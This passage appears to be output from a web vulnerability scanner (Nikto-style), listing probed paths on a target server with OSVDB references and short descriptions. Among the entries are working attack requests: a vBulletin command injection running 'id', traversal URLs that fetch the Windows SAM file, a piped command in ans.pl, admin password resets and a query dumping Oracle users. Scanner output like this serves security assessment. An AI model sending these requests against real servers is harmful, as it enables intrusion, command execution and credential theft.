  291. + OSVDB-235: /cgi-bin/webdist.cgi: Comes with IRIX 5.0 - 6.3; allows to run arbitrary commands
  292. + OSVDB-55: /ews/ews/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. http://www.securityfocus.com/bid/2665.
  293. + OSVDB-5280: /instantwebmail/message.php: Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email.
  294. + OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
  295. + OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
  296. + /admin.php4?reg_login=1: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
  297. + OSVDB-3233: /admin/admin_phpinfo.php4: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
  298. + OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
  299. + OSVDB-5178: /dostuff.php?action=modify_user: Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/
  300. + OSVDB-5088: /accounts/getuserdesc.asp: Hosting Controller 2002 administration page is available. This should be protected.
  301. + OSVDB-35876: /agentadmin.php: Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.
  302. + /sqldump.sql: Database SQL?
  303. + /structure.sql: Database SQL?
  304. + /servlet/SessionManager: IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.
  305. + /ip.txt: This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file.
  306. + /level/42/exec/show%20conf: Retrieved Cisco configuration file.
  307. + /livehelp/: LiveHelp may reveal system information.
  308. + /LiveHelp/: LiveHelp may reveal system information.
  309. + OSVDB-59536: /logicworks.ini: web-erp 0.1.4 and earlier allow .ini files to be read remotely.
  310. + /logs/str_err.log: Bmedia error log, contains invalid login attempts which include the invalid usernames and passwords entered (could just be typos & be very close to the right entries).
  311. + OSVDB-6465: /mall_log_files/order.log: EZMall2000 exposes order information, http://www.ezmall2000.com/, see http://www.mindsec.com/advisories/post2.txt for details.
  312. + OSVDB-3204: /megabook/files/20/setup.db: Megabook guestbook configuration available remotely.
  313. + OSVDB-6161: /officescan/hotdownload/ofscan.ini: OfficeScan from Trend Micro allows anyone to read the ofscan.ini file, which may contain passwords.
  314. + /order/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
  315. + /order/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
  316. + /orders/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
  317. + /Orders/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
  318. + /orders/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
  319. + /Orders/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
  320. + /pmlite.php: A Xoops CMS script was found. Version RC3 and below allows all users to view all messages (untested). See http://www.phpsecure.org/?zone=pComment&d=101 for details.
  321. + /session/admnlogin: SessionServlet Output, has session cookie info.
  322. + OSVDB-613: /SiteScope/htdocs/SiteScope.html: The SiteScope install may allow remote users to get sensitive information about the hosts being monitored.
  323. + /servlet/allaire.jrun.ssi.SSIFilter: Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call, see MPSB01-12 http://www.macromedia.com/devnet/security/security_zone/mpsb01-12.html.
  324. + OSVDB-2881: /pp.php?action=login: Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.
  325. + /isapi/count.pl?: AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.
  326. + /krysalis/: Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot
  327. + /logjam/showhits.php: Logjam may possibly allow remote command execution via showhits.php page.
  328. + /manual.php: Does not filter input before passing to shell command. Try 'ls -l' as the man page entry.
  329. + OSVDB-14329: /smssend.php: PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php
  330. + OSVDB-113: /ncl_items.html: This may allow attackers to reconfigure your Tektronix printer.
  331. + OSVDB-551: /ncl_items.shtml?SUBJECT=1: This may allow attackers to reconfigure your Tektronix printer.
  332. + /photo/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
  333. + /photodata/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
  334. + OSVDB-5374: /pub/english.cgi?op=rmail: BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely.
  335. + /pvote/ch_info.php?newpass=password&confirm=password%20: PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.
  336. + OSVDB-240: /scripts/wsisa.dll/WService=anything?WSMadmin: Allows Webspeed to be remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0.
  337. + OSVDB-3092: /SetSecurity.shm: Cisco System's My Access for Wireless. This resource should be password protected.
  338. + OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
  339. + OSVDB-2225: /thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin: paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.
  340. + OSVDB-3092: /shopadmin.asp: VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.
  341.  
  342.  
  343. + OSVDB-3299: /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
  344. + OSVDB-3396: /mlog.html: Remote file read vulnerability 1999-0068
  345. + OSVDB-3396: /mlog.phtml: Remote file read vulnerability 1999-0068
  346. + OSVDB-3396: /php/mlog.html: Remote file read vulnerability 1999-0346
  347. + OSVDB-3396: /php/mlog.phtml: Remote file read vulnerability 1999-0346
  348. + OSVDB-3411: /soapConfig.xml: Oracle 9iAS configuration file found - see bugtraq #4290.
  349. + OSVDB-3423: /XSQLConfig.xml: Oracle 9iAS configuration file found - see bugtraq #4290.
  350. + OSVDB-3489: /surf/scwebusers: SurfControl SuperScout Web Reports Server user and password file is available. CVE-2002-0705.
  351. + OSVDB-3501: /_private/form_results.htm: This file may contain information submitted by other web users via forms. CVE-1999-1052.
  352. + OSVDB-3501: /_private/form_results.html: This file may contain information submitted by other web users via forms. CVE-1999-1052.
  353. + OSVDB-3501: /_private/form_results.txt: This file may contain information submitted by other web users via forms. CVE-1999-1052.
  354. + OSVDB-3512: /scripts/tools/getdrvrs.exe: MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm).
  355. + OSVDB-3591: /project/index.php?m=projects&user_cookie=1: dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.
  356. + OSVDB-379: /site/eg/source.asp: This ASP (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CVE-2000-0628.
  357. + OSVDB-4: /iissamples/exair/search/advsearch.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.
  358. + OSVDB-4013: /isqlplus: Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user ID field. http://www.ngssoftware.com/advisories/ora-isqlplus.txt
  359. + OSVDB-4161: /data/member_log.txt: Teekai's forum full 1.2 member's log can be retrieved remotely.
  360. + OSVDB-4161: /data/userlog/log.txt: Teekai's Tracking Online 1.0 log can be retrieved remotely.
  361. + OSVDB-4161: /userlog.php: Teekai's Tracking Online 1.0 log can be retrieved remotely.
  362. + OSVDB-4171: /ASP/cart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  363. + OSVDB-4171: /database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  364. + OSVDB-4171: /mcartfree/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  365. + OSVDB-4171: /metacart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  366. + OSVDB-4171: /shop/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  367. + OSVDB-4171: /shoponline/fpdb/shop.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  368. + OSVDB-4171: /shopping/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
  369. + OSVDB-4237: /ban.bak: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
  370. + OSVDB-4237: /ban.dat: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
  371. + OSVDB-4237: /ban.log: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
  372. + OSVDB-4237: /banmat.pwd: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
  373. + OSVDB-4238: /admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected.
  374. + OSVDB-4239: /admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected.
  375. + OSVDB-4240: /utils/sprc.asp: Xpede page may allow SQL injection.
  376. + OSVDB-4314: /texis.exe/?-dump: Texis installation may reveal sensitive information.
  377. + OSVDB-4314: /texis.exe/?-version: Texis installation may reveal sensitive information.
  378. + OSVDB-4360: /acart2_0/acart2_0.mdb: Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.
  379. + OSVDB-4361: /acart2_0/admin/category.asp: Alan Ward A-Cart 2.0 is vulnerable to an XSS attack which may cause the administrator to delete database information.
  380. + OSVDB-474: /Sites/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  381. + OSVDB-474: /Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  382. + OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  383. + OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  384. + OSVDB-474: /Sites/Samples/Knowledge/Push/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  385. + OSVDB-474: /Sites/Samples/Knowledge/Search/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  386. + OSVDB-474: /SiteServer/Publishing/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  387. + OSVDB-17671: /siteserver/publishing/viewcode.asp?source=/default.asp: May be able to view source code using Site Server vulnerability.
  388. + OSVDB-4908: /securelogin/1,2345,A,00.html: Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer overflow.
  389. + OSVDB-5092: /config.inc: DotBr 0.1 configuration file includes usernames and passwords.
  390. + OSVDB-5095: /sysuser/docmgr/ieedit.stm?url=../: Sambar default file may allow directory listings.
  391. + OSVDB-5096: /sysuser/docmgr/iecreate.stm?template=../: Sambar default file may allow directory listings.
  392. + OSVDB-539: /catinfo: May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.
  393. + OSVDB-5407: /soap/servlet/soaprouter: Oracle 9iAS SOAP components allow anonymous users to deploy applications by default.
  394. + OSVDB-5523: /MWS/HandleSearch.html?searchTarget=test&B1=Submit: MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server.
  395. + OSVDB-562: /server-info: This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.
  396. + OSVDB-5709: /.nsconfig: Contains authorization information
  397. + OSVDB-596: /dc/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
  398. + OSVDB-596: /dc/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
  399. + OSVDB-596: /dcshop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
  400. + OSVDB-596: /dcshop/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
  401. + OSVDB-6666: /cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS.
  402. + OSVDB-6670: /applist.asp: Citrix server may allow remote users to view applications installed without authenticating.
  403. + OSVDB-6671: /launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica: Citrix server may reveal sensitive information by accessing the 'advanced' tab on hte login screen.
  404. + OSVDB-6672: /_layouts/alllibs.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am
  405. + OSVDB-6672: /_layouts/settings.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am
  406. + OSVDB-6672: /_layouts/userinfo.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am
  407. + OSVDB-670: /stronghold-info: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. This gives information on configuration. CVE-2001-0868.
  408. + OSVDB-670: /stronghold-status: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. CVE-2001-0868.
  409. + OSVDB-7: /iissamples/exair/howitworks/Code.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.
  410. + OSVDB-7: /iissamples/exair/howitworks/Codebrw1.asp: This is a default IIS script/file which should be removed, it may allow a DoS against the server. CVE-1999-0738. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp. CVE-1999-0449. BID-193.
  411. + OSVDB-707: /globals.jsa: Oracle globals.jsa file
  412. + OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  413. + OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  414. + OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  415. + OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  416. + OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  417. + OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  418. + OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely. http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@127.0.0.1', password file location 'ans_data/ans.passwd'
  419. + OSVDB-724: /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
  420. + OSVDB-789: /iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. CVE-1999-0739. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  421. + OSVDB-9624: /pass_done.php: PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.
  422. + OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
  423. + OSVDB-3092: /README: README file found.
  424. + OSVDB-3233: /j2ee/: j2ee directory found--possibly an Oracle app server directory.
  425. + OSVDB-3233: /WebCacheDemo.html: Oracle WebCache Demo
  426. + OSVDB-32333: /webcache/: Oracle WebCache Demo
  427. + OSVDB-3233: /webcache/webcache.xml: Oracle WebCache Demo
  428. + OSVDB-3233: /bmp/: SQLJ Demo Application
  429. + OSVDB-3233: /bmp/global-web-application.xml: SQLJ Demo Application
  430. + OSVDB-3233: /bmp/JSPClient.java: SQLJ Demo Application
  431. + OSVDB-3233: /bmp/mime.types: SQLJ Demo Application
  432. + OSVDB-3233: /bmp/README.txt: SQLJ Demo Application
  433. + OSVDB-3233: /bmp/sqljdemo.jsp: SQLJ Demo Application
  434. + OSVDB-3233: /bmp/setconn.jsp: SQLJ Demo Application
  435. + OSVDB-3233: /ptg_upgrade_pkg.log: Oracle log files.
  436. + OSVDB-3233: /OA_HTML/oam/weboam.log: Oracle log files.
  437. + OSVDB-3233: /webapp/admin/_pages/_bc4jadmin/: Oracle JSP files
  438. + OSVDB-3233: /_pages/_webapp/_admin/_showpooldetails.java: Oracle JSP files
  439. + OSVDB-3233: /_pages/_webapp/_admin/_showjavartdetails.java: Oracle JSP file
  440. + OSVDB-3233: /_pages/_demo/: Oracle JSP file
  441. + OSVDB-3233: /_pages/_webapp/_jsp/: Oracle JSP file.
  442. + OSVDB-3233: /_pages/_demo/_sql/: Oracle JSP file.
  443. + OSVDB-3233: //OA_HTML/_pages/: Oracle JSP file.
  444. + OSVDB-3233: /OA_HTML/webtools/doc/index.html: Cabo DHTML Components Help Page
  445. + OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
  446. + OSVDB-3233: /apex/: Oracle Application Express login screen.
  447. + OSVDB-3233: /OA_JAVA/: Oracle Applications Portal Page
  448. + OSVDB-3233: /OA_HTML/: Oracle Applications Portal Page
  449. + OSVDB-3233: /aplogon.html: Oracle Applications Portal Page
  450. + OSVDB-3233: /appdet.html: Oracle Applications Portal Pages
  451. + OSVDB-3233: /servlets/weboam/oam/oamLogin: Oracle Application Manager
  452. + OSVDB-3233: /OA_HTML/PTB/mwa_readme.htm: Oracle Mobile Applications Industrial Server administration and configuration inerface
  453. + OSVDB-3233: /reports/rwservlet: Oracle Reports
  454. + OSVDB-3233: /reports/rwservlet/showenv: Oracle Reports
  455. + OSVDB-3233: /reports/rwservlet/showmap: Oracle Reports
  456. + OSVDB-3233: /reports/rwservlet/showjobs: Oracle Reports
  457. + OSVDB-3233: /reports/rwservlet/getjobid7?server=myrep: Oracle Reports
  458. + OSVDB-3233: /reports/rwservlet/getjobid4?server=myrep: Oracle Reports
  459. + OSVDB-3233: /reports/rwservlet/showmap?server=myserver: Oracle Reports
  460. + OSVDB-3093: /pls/portal/owa_util.cellsprint?p_theQuery=select: Direct access to Oracle packages could have an unkown impact.
  461. + OSVDB-3093: /pls/portal/owa_util.listprint?p_theQuery=select: Access to Oracle pages could have an unknown impact.
  462. + OSVDB-3093: /pls/portal/owa_util.show_query_columns?ctable=sys.dba_users: Access to Oracle pages could have an unknown impact.
  463. + OSVDB-3093: /pls/portal/owa_util.showsource?cname=owa_util: Access to Oracle pages could have an unknown impact.
  464. + OSVDB-3093: /pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users: Access to Oracle pages could have an unknown impact.
  465. + OSVDB-3093: /pls/portal/owa_util.signature: Access to Oracle pages could have an unknown impact.
  466. + OSVDB-3093: /pls/portal/HTP.PRINT: Access to Oracle pages could have an unknown impact.
  467. + OSVDB-3093: /pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT: Access to Oracle pages could have an unknown impact.
  468. + OSVDB-3093: /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW: Access to Oracle pages could have an unknown impact.
  469. + OSVDB-3093: /pls/portal/PORTAL.wwv_form.genpopuplist: Access to Oracle pages cold have an unknown impact.
  470. + OSVDB-3093: /pls/portal/PORTAL.wwv_ui_lovf.show: Access to Oracle pages could have an unknown impact.
  471. + OSVDB-3093: /pls/portal/PORTAL.wwa_app_module.link: Access to Oracle pages could have an unknown impact.
  472. + OSVDB-3093: /pls/portal/PORTAL.wwv_dynxml_generator.show: Access to Oracle pages could have an unknown impact.
  473. + OSVDB-3093: /pls/portal/PORTAL.home: Access to Oracle pages could have an unknown impact.
  474. + OSVDB-3093: /pls/portal/PORTAL.wwv_setting.render_css: Access to Oracle pages could have an unknown impact.
  475. + OSVDB-3093: /pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO: Access to Oracle pages could have an unknown impact.
  476. + OSVDB-3093: /pls/portal/SELECT: Access to Oracle pages could have an unknown impact.
  477. + OSVDB-3093: /pls/portal/null: Access to Oracle pages could have an unknown impact.
  478. + OSVDB-3093: /OA_MEDIA/: Oracle Applications portal pages found.
  479. + OSVDB-3093: /OA_HTML/META-INF/: Oracle Applications portal pages found.
  480. + OSVDB-3093: /OA_HTML/jsp/por/services/login.jsp: Oracle Applications portal pages found.
  481. + OSVDB-3093: /OA_HTML/PTB/ICXINDEXBASECASE.htm: Oracle Applications portal pages found.
  482. + OSVDB-3093: /OA_HTML/PTB/ECXOTAPing.htm: Oracle Applications portal pages found.
  483. + OSVDB-3093: /OA_HTML/PTB/xml_sample1.htm: Oracle Applications portal pages found.
  484. + OSVDB-3093: /OA_HTML/jsp/wf/WFReassign.jsp: Oracle Applications portal pages found.
  485. + OSVDB-3093: /OA_JAVA/Oracle/: Oracle Applications portal pages found.
  486. + OSVDB-3093: /OA_JAVA/servlet.zip: Oracle Applications portal pages found.
  487. + OSVDB-3093: /OA_JAVA/oracle/forms/registry/Registry.dat: Oracle Applications portal pages found.
  488. + OSVDB-3093: /OA_HTML/oam/: Oracle Applications portal pages found.
  489. + OSVDB-3233: /OA_HTML/jsp/: Oracle Applications portal page found
  490. + OSVDB-3233: /OA_HTML/jsp/fnd/fndversion.jsp: Oracle Applications help page found.
  491. + OSVDB-3233: /OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc: Oracle Applications help page found.
  492. + OSVDB-3233: /OA_HTML/jsp/fnd/fndhelputil.jsp: Oracle Applications help page found.
  493. + OSVDB-3092: /install/install.php: Install file found.
  494. + OSVDB-3092: /cehttp/trace: Sterling Commerce Connect Direct trace log file may contain user ID information.
  495. + OSVDB-3092: /cehttp/property/: Sterling Commerce Connect Direct configuration files.
  496. + OSVDB-3233: /nps/iManager.html: Novell iManager found.
  497. + OSVDB-3233: /nps/version.jsp: Novell iManager version found.
  498. + OSVDB-3233: /nps/servlet/webacc?taskId=dev.Empty&merge=fw.About: Novell iManager version found.
  499. + OSVDB-3233: /doc/icodUserGuide.pdf: Instant Capacity on Demand (iCOD) Userís Guide.
  500. + OSVDB-3233: /doc/planning_SuperDome_configs.pdf: Planning HP SuperDome Configurations
  501. + OSVDB-3233: /doc/vxvm/pitc_ag.pdf: VERITAS FlashSnapTM Point-In-Time Copy Solutions documentation.
  502. + OSVDB-3233: /doc/Judy/Judy_tech_book.pdf: HP Judy documentation found.
  503. + OSVDB-3233: /doc/vxvm/vxvm_ag.pdf: Veritas Volume Manager documentation.
  504. + OSVDB-3233: /doc/vxvm/vxvm_hwnotes.pdf: Veritas Volume Manager documentation.
  505. + OSVDB-3233: /doc/vxvm/vxvm_ig.pdf: Veritas Volume Manager documentation.
  506. + OSVDB-3233: /doc/vxvm/vxvm_mig.pdf: Veritas Volume Manager documentation.
  507. + OSVDB-3233: /doc/vxvm/vxvm_tshoot.pdf: Veritas Volume Manager documentation.
  508. + OSVDB-3233: /doc/vxvm/vxvm_notes.pdf: Veritas Volume Manager documentation.
  509. + OSVDB-3233: /doc/vxvm/vxvm_ug.pdf: Veritas Volume Manager documentation.
  510. + OSVDB-3092: /staging/: This may be interesting...
  511. + OSVDB-3092: /_archive/: Archive found.
  512. + OSVDB-3092: /INSTALL.txt: Default file found.
  513. + OSVDB-3092: /UPGRADE.txt: Default file found.
  514. + OSVDB-3092: /install.php: install.php file found.
  515. + OSVDB-3092: /LICENSE.txt: License file found may identify site software.
  516. + OSVDB-3092: /upgrade.php: upgrade.php was found.
  517. + OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
  518. + OSVDB-3092: /CHANGELOG.txt: A changelog was found.
  519. + OSVDB-3092: /sitemap.gz: The sitemap.gz file, used for Google indexing, contains an xml representation of the web site's structure.
  520. + OSVDB-3092: /content/sitemap.gz: The sitemap.gz file, used for Google indexing, contains an xml representation of the web site\'s structure.
  521. + /webservices/IlaWebServices: Host has the Oracle iLearning environment installed.
  522. + /phone/: This may be interesting...
  523. + /aspnet_files/: .NET client side script files indicate .NET may be running. See http://msdn.microsoft.com/en-us/library/aa479045.aspx#aspplusvalid_clientside
  524. + OSVDB-3092: /Admin/: This might be interesting...
  525. + OSVDB-3092: /af/: This might be interesting... potential country code (Afghanistan)
  526. + OSVDB-3092: /ax/: This might be interesting... potential country code (Aland Islands)
  527. + OSVDB-3092: /al/: This might be interesting... potential country code (Albania)
  528. + OSVDB-3092: /dz/: This might be interesting... potential country code (Algeria)
  529. + OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
  530. + OSVDB-3092: /ad/: This might be interesting... potential country code (Andorra)
  531. + OSVDB-3092: /ao/: This might be interesting... potential country code (Angola)
  532. + OSVDB-3092: /ai/: This might be interesting... potential country code (Anguilla)
  533. + OSVDB-3092: /aq/: This might be interesting... potential country code (Antarctica)
  534. + OSVDB-3092: /ag/: This might be interesting... potential country code (Antigua And Barbuda)
  535. + OSVDB-3092: /ar/: This might be interesting... potential country code (Argentina)
  536. + OSVDB-3092: /am/: This might be interesting... potential country code (Armenia)
  537. + OSVDB-3092: /aw/: This might be interesting... potential country code (Aruba)
  538. + OSVDB-3092: /au/: This might be interesting... potential country code (Australia)
  539. + OSVDB-3092: /at/: This might be interesting... potential country code (Austria)
  540. + OSVDB-3092: /az/: This might be interesting... potential country code (Azerbaijan)
  541. + OSVDB-3092: /bs/: This might be interesting... potential country code (Bahamas)
  542. + OSVDB-3092: /bh/: This might be interesting... potential country code (Bahrain)
  543. + OSVDB-3092: /bd/: This might be interesting... potential country code (Bangladesh)
  544. + OSVDB-3092: /bb/: This might be interesting... potential country code (Barbados)
  545. + OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
  546. + OSVDB-3092: /be/: This might be interesting... potential country code (Belgium)
  547. + OSVDB-3092: /bz/: This might be interesting... potential country code (Belize)
  548. + OSVDB-3092: /bj/: This might be interesting... potential country code (Benin)
  549. + OSVDB-3092: /bm/: This might be interesting... potential country code (Bermuda)
  550. + OSVDB-3092: /bt/: This might be interesting... potential country code (Bhutan)
  551. + OSVDB-3092: /bo/: This might be interesting... potential country code (Bolivia)
  552. + OSVDB-3092: /ba/: This might be interesting... potential country code (Bosnia And Herzegovina)
  553. + OSVDB-3092: /bw/: This might be interesting... potential country code (Botswana)
  554. + OSVDB-3092: /bv/: This might be interesting... potential country code (Bouvet Island)
  555. + OSVDB-3092: /br/: This might be interesting... potential country code (Brazil)
  556. + OSVDB-3092: /io/: This might be interesting... potential country code (British Indian Ocean Territory)
  557. + OSVDB-3092: /bn/: This might be interesting... potential country code (Brunei Darussalam)
  558. + OSVDB-3092: /bg/: This might be interesting... potential country code (Bulgaria)
  559. + OSVDB-3092: /bf/: This might be interesting... potential country code (Burkina Faso)
  560. + OSVDB-3092: /bi/: This might be interesting... potential country code (Burundi)
  561. + OSVDB-3092: /kh/: This might be interesting... potential country code (Cambodia)
  562. + OSVDB-3092: /cm/: This might be interesting... potential country code (Cameroon)
  563. + OSVDB-3092: /ca/: This might be interesting... potential country code (Canada)
  564. + OSVDB-3092: /cv/: This might be interesting... potential country code (Cape Verde)
  565. + OSVDB-3092: /ky/: This might be interesting... potential country code (Cayman Islands)
  566. + OSVDB-3092: /cf/: This might be interesting... potential country code (Central African Republic)
  567. + OSVDB-3092: /td/: This might be interesting... potential country code (Chad)
  568. + OSVDB-3092: /cl/: This might be interesting... potential country code (Chile)
